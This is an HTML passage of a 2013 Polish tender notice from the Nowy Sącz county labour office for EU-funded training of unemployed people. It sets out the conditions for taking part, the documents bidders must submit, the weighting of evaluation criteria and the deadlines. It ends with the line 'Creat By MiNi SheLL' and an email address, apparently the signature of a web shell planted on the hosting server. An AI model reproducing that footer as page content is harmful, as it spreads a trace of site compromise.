<p><b>Informacja na temat wadium:</b> Z uwagi na wartość przedmiotu zamówienia Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi zał. nr 3 do specyfikacji). Zamawiający żąda zgodnie z Art. 20 ust. 1 ustawy z dnia 20 kwietnia 
2004 r. o promocji zatrudnienia i instytucjach rynku pracy - Tekst jednolity: Dz. U. 2008 r. Nr 69 poz. 415 wpisu Wykonawcy do rejestru instytucji szkoleniowych. Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonym oświadczeniu (Załącznik nr 3 do SIWZ) oraz poprzez sprawdzenia w systemie elektronicznym Syriusz www.ris.praca.gov.pl prowadzonym przez Wojewódzkie Urzędy Pracy czy Wykonawca posiada aktualny na dany rok kalendarzowy wpis do rejestru instytucji szkoleniowych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi zał. nr 3 do specyfikacji).Warunek ten zostanie spełniony jeśli Wykonawca wykaże minimum 
1 szkolenie przeprowadzone dla co najmniej 10 osobowej grupy zgodnej z przedmiotem zamówienia. 
Załączony wykaz wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert szkoleń grupowych dla osób bezrobotnych zgodnych z przedmiotem zamówienia powinien zawierać m.in.: nazwę szkolenia; liczbę przeszkolonych osób bezrobotnych; wartość szkolenia; termin realizacji szkolenia; nazwę i adres zleceniodawcy. Do każdego z zamieszczonych w wykazie szkoleń należy dołączyć kserokopię dokumentów (np. referencji) potwierdzających, że w/w szkolenia zostały wykonane z należytą starannością.

Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonym oświadczeniu i dokumentach wymaganych w specyfikacji (Załącznik nr 3 i 6 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi zał. nr 3 do specyfikacji). Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocenę spełnienia warunku w postępowaniu Zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia zgodnie z formułą spełnia - nie spełnia (Załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi zał. nr 3 do specyfikacji). Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocenę spełnienia warunku w postępowaniu Zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia zgodnie z formułą spełnia - nie spełnia (Załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi zał. nr 3 do specyfikacji). Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocenę spełnienia warunku w postępowaniu Zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia zgodnie z formułą spełnia - nie spełnia (Załącznik nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1) Certyfikat jakości usług ISO - oryginał lub kopię poświadczoną (na każdej zapisanej stronie) za zgodność z oryginałem przez Wykonawcę - w przypadku posiadania stosownego dokumentu,
2) Akredytacja Kuratorium Oświaty zgodna z przedmiotem zamówienia - oryginał lub kopię poświadczoną (na każdej zapisanej stronie) za zgodność z oryginałem przez Wykonawcę - w przypadku posiadania stosownego dokumentu</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca składa listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp, albo informacja o tym, że nie należy do grupy kapitałowej.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Doświadczenie Wykonawcy w realizacji szkoleń dla osób bezrobotnych zgodnych z przedmiotem zamówienia - 20</li>
<li>3 - Certyfikat jakości usług ISO - 10</li>
<li>4 - Akredytacja Kuratorium Oświaty zgodna z przedmiotem zamówienia - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Umowa  może  ulec   zmianie  w   przypadku  zmniejszenia   liczby  uczestników   szkolenia z przyczyn niezależnych od Zamawiającego i będącego wynikiem:
a) niepodjęcia szkolenia pomimo wcześniejszych deklaracji  o uczestnictwie,
b) przerwania uczestnictwa w szkoleniu (podjęcie pracy przez bezrobotnego, choroba, nieusprawiedliwiona rezygnacja ze szkolenia), którego nie można było przewidzieć w dniu zawarcia umowy.
2. Umowa może ulec zmianie w wyniku wystąpienia następujących okoliczności ze strony Wykonawcy:
a) zmiany kadry realizującej szkolenie w wyniku nieprzewidywalnych  zdarzeń losowych (np. choroba, śmierć, rozwiązanie stosunku pracy), których nie można było przewidzieć w dniu zawarcia umowy.
3. Zamawiający wyliczy do umowy koszt szkolenia jednej osoby brutto jako iloraz całkowitej ceny brutto za szkolenie przez ilość uczestników szkolenia podanych w specyfikacji istotnych warunków zamówienia.
4. W sytuacji, gdy liczba osób szkolonych ulegnie zmniejszeniu stosownie do postanowień pkt. 1 b) wynagrodzenie za szkolenie tych osób stanowi sumę kosztów zrealizowanych osobogodzin przez każdą z tych osób.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.powiat-ns.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy dla Powiatu Nowosądeckiego, ul. Nawojowska 118, 33-300 Nowy Sącz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.03.2013 godzina 08:00, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego w Nowym Sączu przy ul. Nawojowskiej 118, na dzienniku podawczym..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach projektu  pn.: Twoja decyzja - nasza pomoc współfinansowanego ze środków Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki,  Priorytet VII  Działanie 7.2  Poddziałanie 7.2.1..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com